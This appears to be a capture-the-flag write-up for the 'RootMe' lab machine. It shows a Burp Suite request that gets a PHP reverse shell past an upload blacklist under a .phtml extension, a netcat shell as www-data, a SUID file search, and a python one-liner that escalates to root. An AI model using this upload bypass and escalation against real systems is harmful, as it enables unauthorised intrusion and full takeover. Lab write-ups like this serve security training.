Skip to main content

RootMe

BurpSuite

  • Request From: [IP:80/panel]

There is a Server Side Filtering which Prevents us from Uploading specific File Extensions. We can use BURP:Intruder to FUZZ php-reverse-shell.[EXTENSION_TO_FUZZ] Extension to Find which one can be Uploaded.

POST /panel/ HTTP/1.1
Host: 10.10.126.254
Referer: http://10.10.126.254/panel/
Cookie: PHPSESSID=a2124oo7f1hp7un7b5hlvrn2ep

Content-Disposition: form-data; name="fileUpload"; filename="php-reverse-shell.php"
Content-Type: application/x-php

The Extension php-reverse-shell.[phtml] is not Blacklisted.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="../css/panel.css">
<script src=../"js/maquina_de_escrever.js"></script>
<title>HackIT - Home</title>
</head>
<body>
<div class="first">
<div class="main-div">
<form action="" method="POST" enctype="multipart/form-data">
<p>Select a file to upload:</p>
<input type="file" name="fileUpload" class="fileUpload">
<input type="submit" value="Upload" name="submit">
<p class='success'>O arquivo foi upado com sucesso!</p><a href='../uploads/php-reverse-shell.phtml'>Veja!</a> </form>
</div>
</div>
</body>
</html>

  • Translation
┌──────────────────────────────────┐    ┌──────────────────────────────────────────┐
| O arquivo foi upado com sucesso! | -► | The file has been successfully uploaded! |
└──────────────────────────────────┘ └──────────────────────────────────────────┘
  • The Reverse Shell got Successfully Uploaded to: [IP:80/uploads]
   [ICO]             Name            Last modified   Size Description
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[PARENTDIR] Parent Directory -
[ ] php-reverse-shell.phtml 2022-10-07 07:47 5.4K
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


Privilege Escalation

  • We can catch the Reverse Shell Using netcat
www-data@rootme /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • The /usr/bin/python Binary has the SUID Bit Set.
www-data@rootme /$ find / -type f -perm -04000 -ls 2>/dev/null
...
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
...

  • Using Python to Escalate Privileges.
www-data@rootme /$ /usr/bin/python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
www-data@rootme /$ id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
www-data@rootme /$ whoami
root